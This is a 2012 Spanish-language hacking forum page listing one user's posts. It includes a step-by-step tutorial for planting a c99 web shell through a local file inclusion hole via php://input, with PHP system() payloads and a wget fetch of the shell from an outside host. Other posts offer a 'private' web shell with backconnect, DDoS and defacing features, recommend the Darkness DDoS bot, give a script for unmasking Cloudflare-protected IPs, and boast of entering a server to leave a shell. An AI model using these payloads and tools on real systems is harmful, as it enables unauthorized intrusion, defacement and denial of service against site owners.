Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - CalebBucker

Páginas 1 ... 3 4 5 6 7 8

#81

Dudas y pedidos generales / Re:Trazar email

Julio 25, 2012, 11:43:07 PM

Hola,
Podes obtener la IP de la persona que te envia el mensaje a tu bandeja de correo, solo basta con ingresar al cuerpo del mensaje y seleccionar la opcion "Ver codigo fuente del mensaje"

Y luego en el code html, buscas esta linea:
Received: from [IP] (port= helo=IP)

Coges la IP y le haces un No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Saludos.

#82

Cursos, manuales y libros / Re:Guía para SQLi (MySQL, MSSQL & ORACLE)

Julio 25, 2012, 05:01:55 PM

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

#83

Pentesting / Sensitive Buster v1.0 - r00tw0rm Coders

Julio 18, 2012, 11:28:12 PM

El equipo de r00tw0rm acaba de lanzar hoy una nueva herramienta, llamada "Sensitive Buster" codeada por Th3breachery Angel Injection.

La herramienta encuentra las vulnerabilidades en los servidores web como tambien Paneles de Administración, Archivos y Carpetas confidenciales, Shells e incluso Copias de Seguridad (backup).

La herramienta esta codeada en Python y es de código abierto para que todo el mundo pueda editarlo.

Uso:

* Instalar y Activar Python
* Abrir la consola/terminal
* Teclear ./sensitivebuster.py

Modos:

* -shell
* -backup
* -dir
* -admin
* -files

Ejemplo:

python No tienes permitido ver los links. Registrarse o Entrar a mi cuenta No tienes permitido ver los links. Registrarse o Entrar a mi cuenta -m files

Utilizar la Herramienta con Proxy:

python No tienes permitido ver los links. Registrarse o Entrar a mi cuenta No tienes permitido ver los links. Registrarse o Entrar a mi cuenta -m files -p 127.0.0.1:8080

Descargar Sensitive Buster: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Password : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

VideoTutorial:

Fuente: TheHackerNews - Traduced By Me

#84

Bugs y Exploits / Re:WordPress Security Fingerprinter Exploit-DB

Julio 17, 2012, 11:07:59 PM

Cita de: [Corruptedyte link=topic=10344.msg37277#msg37277 date=1342573176]
Código: php
Si no te gusta, no la uses.
WTF? HAHAHAHA
Fue una simple pregunta sin ánimos de ofenderte, mejor dime que no sabes en vez de contestar de esa manera tan ridícula e infantil.

Tu comentario es con animo de ofender, aunque vos digas que NO ! & si no te gusta la Tool no la uses asi de simple.
WpScan: Solo funciona el enumerate & plugins.
No podes decir que "que tiene esta tool que no tenga la otra" es LÓGICO que todas las herramientas no tienen el mismo funcionamiento.

#85

Bugs y Exploits / Re:WordPress Security Fingerprinter Exploit-DB

Julio 17, 2012, 02:28:37 PM

Cita de: [Corruptedyte link=topic=10344.msg37243#msg37243 date=1342543621]
Que tiene este que no tenga wpscan?

Si no te gusta, no la uses.

#86

Pentesting / PwnieExpress - Pentesting en Nokia N900

Julio 15, 2012, 03:05:17 PM

PwnPhone
Un Nokia N900 basado en la plataforma Pentesting.

PwnieExpress una de la mejor suite de Pentesting para el Nokia N900. Incluye Aircrack, Metasploit, Kismet, GrimWEPa, SET, FastTrack, Ettercap, Nmap y mucho más.

La pantalla es totalmente personalizada para el Pentesting con accesos directos a Macchanger, incorporado en la tarjeta inalámbrica compatible con la inyección de paquetes, el modo monitor y el modo promiscuo también está disponible.

Principal Pantalla del Escritorio:

Código: php

1. Conky - Para ver el uso del sistema y stats
2. Promiscuous_on_off - Script para activar el modo promiscuo de manera intermitente durante wlan0
3. xterm RootShell - el acceso de root shell en el directorio /home/usuario/MyDocs/pwnphone
4. Macchanger - Rolls dirección MAC de la tarjeta inalámbrica wlan0 y los cambios de nombre de host a "DellPC"
5. Nmap - Versión de línea de Comando de Nmap
6. Zenmap - Versión GUI de Nmap
7. InjectionON - Carga los controladores necesarios para la inyección de paquetes inalámbrico
8. InjectionOFF - Descarga los controladores de la inyección de paquetes y vuelve a cargar los controladores normales wifi
9. Airodump-ng - Rápido acceso a la tecnología inalámbrica sniffer, ejecutando: airodump-ng wlan0
10. Kismet - Wireless Sniffer / herramienta de mapeo
11. Wifite - Herramienta de ataque Wirelles automatizado
12. Wifizoo - Herramienta inalámbrica para olfatear las sesiones activas en el wifi
13. Grimwepa - Hherramienta en GUI que se utilizan con la suite aircrack-ng - WEP / WPA cracking
14. Wepbuster - Automáticamente rompe las redes inalámbricas de WEP en el rango (¡cuidado!)
15. El modo promiscuo en el botón de off - Activa el modo promiscuo en wlan0
16. Wireshark - acceso directo del escritorio - analizador de paquetes / sniffer
17. Tshark - La versión CMD línea de Wireshark - Se ejecuta en wlan0
18. Tcpdump - Ejecutar tcpdump en wlan0 (tcpdump-s0-n-i wlan0)
19. Sslstrip - Herramienta utilizada para despojar a los sitios web de SSL y oler las credenciales
20. Scapy - Interfaz Scapy - la manipulación de paquetes interactivos
21. Nikto - Herramienta Web de exploración de vulnerabilidades
22. SET - Kit de herramientas de Ingeniería Social
23. Metasploit - la versión del CMD msf3 (msfconsole)
24. Metasploit-GUI - versión GUI de msf3
25. Fasttrack - Herramienta automatizada pentesting
26. EttercapNG-Curses - Version Curses de EttercapNG
27. EttercapNG-GUI - versión GUI de EttercapNG

Algunas Imagenes de las Herramientas:

Para poder obtener todas estas aplicaciones en nuestro Nokia N900, tenemos que ingresar a la pagina oficial del proyecto No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y comprar dicho archivo, la cual el precio es de $960.00 USD

Pero si ya tenes el Nokia N900 en tus manos, te facilitare las aplicaciones totalmente gratis !! solo tenes que dirigirte a este link para descargar la aplicación:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta (430 MB)

Extraes el archivo tar.gz y podrás ver una carpeta con el nombre "pwnimage" luego abres esa carpeta y habrá un archivo de instrucciones sobre "Como Instalar Pwnie Express" sigues todas las instrucciones y voila!! tendrás tu MÓVIL listo para realizar Pruebas de Penetración!

Acceso SHH:
Username: root
Password: pwnphone
Ruta: /home/user/MyDocs/pwnphone

Espero te guste...

Saludos.

#87

Bugs y Exploits / Subiendo Shell Explotando LFI via PHP:INPUT

Julio 14, 2012, 11:53:18 PM

Hola, esta vez les dejare un tutorial, la cual consiste en subir una SHELL explotando la vulnerabilidad LFI via "php:input" , solo basta con inyectar algunos códigos para obtener la misma.

Que es el LFI?

Es una falla en la programacion de una aplicacion; falla mediante la cual se pueden incluir archivos que se encuentren en el servidor como por ejemplo el /etc/passwd o algun otro archivo de configuracion que nos provea de informacion para atacar el sitio.

Ahora bien, empecemos...

Algunos de los sitios webs vulnerables a LFI, tienen este aspecto:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
www.sitio-web.com/index.php?file=

Ahora bien... para comprobar si realmente el sitio web es vulnerable a LFI, tenemos que ver si la web puede leer el "etc/passwd" cosa que el sitio web quedaría de la siguiente forma:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Si el sitio web puede leer dicho código, la web quedaría asi:

Como vemos en la imagen, ya comprobamos que el sitio web es vulnerable a LFI.

Ahora, haremos el siguiente paso, para subir una shell al servidor.

Necesitaremos lo siguiente:

Navegador: Firefox
Addon: HackBar

Ahora vamos a tratar de poner este método en acción.

Cargamos la url vulnerable al HackBar e inyectamos el No tienes permitido ver los links. Registrarse o Entrar a mi cuenta la cual quedaría asi:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Habilitamos el "Enable Post data" y colocamos el siguiente comando:

<? system('uname -a'); ?>

Ejemplo:

Otros comandos:

Lista de directorios
<? system ('ls'); ?>

Identificación
<? system ('id'); ?>

Convertir el formato
<? system ('mv file.txt file.php'); ?>

Descargar
<? system ('wget'); ?>

Ahora, vamos a utilizar el comando <? system ('wget'); ?> para descargar alguna shell en el sitio.

Utilizaremos esta shell en .txt: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

<? system ('wget No tienes permitido ver los links. Registrarse o Entrar a mi cuenta'); ?>

Ahora, comprobaremos si la shell se descargo perfectamente, ejecutando el siguiente comando:

<? system ('ls'); ?>

Si la shell, se descargo perfectamente, en este caso lo veremos como c99.txt

Ahora, como ya sabemos que nuestra shell se ejecuto perfectamente, tenemos que cambiarle el formato a .php para poder ingresar a la misma desde el navegador, solo basta con colocar el siguiente comando:

<? system ('mv c99.txt calebbucker.php'); ?>

Ahora, listamos nuevamente los directorios y apreciaremos nuestra shell en .php

Ahora, en este caso nos dirigimos a No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y Voila tenemos nuestra shell!!

No Entendistes?

Observa el VideoTutorial en 1080p HD!

Espero te sirva y lo uses con prudencia.

Saludos.

#88

Bugs y Exploits / Re:WordPress Security Fingerprinter Exploit-DB

Julio 14, 2012, 07:14:56 PM

El "deface" es lammer... yo solo entre al servidor para dejar mi shell UDP.
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

#89

Bugs y Exploits / WordPress Security Fingerprinter Exploit-DB

Julio 12, 2012, 06:19:08 PM

Hola, esta vez les dejare una herramienta para encontrar Plugins Vulnerables en los sitios WordPress, es útil para tareas de Pruebas de Penetración y/o para la diversión y beneficio.

La versión actual cuenta con 240 Pruebas de Seguridad.

Esta versión se publico el 18 de Junio del 2012.

Descargamos la herramienta desde el siguiente link: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Descomprimimos, y ejecutamos al herramienta con el siguiente comando:

Código: text

root@TioSam:~# cd Desktop
root@TioSam:~/Desktop# cd WordPress
root@TioSam:~/Desktop/WordPress# ls
README  WP
root@TioSam:~/Desktop/WordPress# ./WP http://www.noticiasdehackers.com

En este caso yo he colocado, el link No tienes permitido ver los links. Registrarse o Entrar a mi cuenta para poner a prueba la herramienta, como se aprecia en la siguiente imagen:

Como podemos apreciar, la herramienta nos arrojo la Version WordPress del sitio web en este caso es 3.3.1 en la cual tambien nos arroja el exploit para dicha versión.

Mas abajo, nos muestra los módulos vulnerables, en la cual nos muestra con sus exploits respectivos.

Si queres ver el funcionamiento de esta herramienta, observa el siguiente vídeo, en la cual podes colocar la resolución en 1080p para que aprecies mejor el vídeo.

Espero le des buen uso y puedas parchear las vulnerabilidades de algun sitio WordPress.

Saludos.

#90

Hacking / Re:Metodos alternativos para Accesar a un servidor [Hacking For Dummies]

Julio 07, 2012, 06:40:28 PM

Yo siempre recurro al reverse y logro mi objetivo XD

#91

Hacking / Re:Interceptacion de Entregas y Paqueteria "Servientrega"

Julio 07, 2012, 06:01:23 PM

En todo el mundo pasa eso, porque a las entidades esa, solo les interesa el dinero.

#92

Dudas y pedidos generales / Re:¿ que me recomiendan ?

Julio 05, 2012, 10:45:20 PM

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Quiero empezar a jugar con el tema de los botnets, crypters, etc. para aprender un poco para testearlos.
Quisiera saber cual bot me recomiendan para empezar, que sirva para todos los windows xp/vista/7 y tenga distintas funciones (ddos, keylog, etc.) Desde ya muchas gracias. Salu2 a toda la comunidad.

Si la queres para DDos usa la Darkness (Optima)

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Ahi incluye los archivos...

#93

Dudas y pedidos generales / Re:[Ayuda] Pixelear Video

Julio 04, 2012, 09:36:14 PM

Hola, ya lo ando haciendo... gracias por responder, les debo una

#94

Dudas y pedidos generales / Re:[Ayuda] Pixelear Video

Julio 04, 2012, 09:21:07 PM

Si, pero lo que pasa esque soy noob en Windows T_T

#95

Dudas y pedidos generales / [SOLUCIONADO] Pixelear Video

Julio 04, 2012, 07:49:12 PM

Hola que tal...

Bueno quisiera saber si alguien conoce la forma o un soft para pixelear un video.
Lo que pasa es que he realizado un video y dentro de ello se muestra algunos links e imagenes que quiero que se vean opacas o que simplemente no se vea.

Si alguien conoce o sabe como hacerlo, que responda por favor.

Gracias de antemano

#96

Bugs y Exploits / I-47 v1.3 Shell Private

Julio 04, 2012, 05:16:39 PM

Hola, esta vez voy a dejarles una Shell totalmente privada, la cual me la envió un amigo de Indian Hackers.

Las compartire con ustedes, esperando que le den buen uso, y no estén divulgando el enlace de este archivo en otros foros.

Características de la Shell:

- Mass Code Injector
- Web Surver Fuzzer
- Mass Mailer + Mail Bomber
- Proxy Installer
- Forums Defacer + Forum Password Changer
- Dos
- Backconnect with perl, c, php
- Bind Shell
- Database Connect & Dump
- Domain info
- PHP Evaluate
- Automatic Symlink creation
- Automatic enable all functions and turn safe mode off
- Download whole website with just one click
- Password Protected
- Zone-h Poster
- Included Bypasser
- Attractive Look

Nuevas funciones:

- Included Script Locator
- Included TCP / UDP Scanner
- Included Bruteforcer
- Removed some bugs

Imágenes:

Descargar Shell en Ingles:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Descargar Shell en Hindi (India)
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Usuario: I-47
Password: I-47

Saludos...

#97

Bugs y Exploits / Re:Symlink con la tool

Julio 04, 2012, 04:09:01 PM

El No tienes permitido ver los links. Registrarse o Entrar a mi cuenta solo funciona con algunos cms y no es compatibles con todos...

#98

Bugs y Exploits / Re:Upload Shell PHBB Forum

Julio 04, 2012, 04:05:34 PM

Si, como no.

Shell b37ak
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

saludos.

#99

Hacking / Re:Obteniendo IP Real en Sitios Protegidos por CLOUDFLARE

Julio 03, 2012, 05:05:25 PM

Existen muchos metodos para obtener dichas ip, tambien con un simple No tienes permitido ver los links. Registrarse o Entrar a mi cuenta sacas todo...

Dejare otro code en Python para obtener la IP Real

Código: php

# Cloudflare > real ip
# Coded by Dan
# Shoutouts to Mx. And Hax0r.

import socket

def getsite():
    global site
    site = raw_input("[!] Enter the URL: ")
    if site[:7] == "http://":
  site = site[7:]

getsite()

def getip():
    list = ["cpanel.","ftp.","mail.","webmail.","direct.","direct-connect.", "record."]
    print("[!] Trying to grab the real IP using different protocols.")
    for item in list:
  try:
     ip = socket.gethostbyname(item + site)
     print "[+] " + item + site +  ", " + ip + " found."
  except:
    print("[-] " + item + site + " not found.")

getip()

Saludos.

#100

Dudas y pedidos generales / Re:[Ayuda] Eliminar particiones de Linux en Windows 7

Julio 02, 2012, 11:49:13 PM

Es lo mismo, formatees en cualquier tipo igual tendrás los mismos resultados.

Páginas 1 ... 3 4 5 6 7 8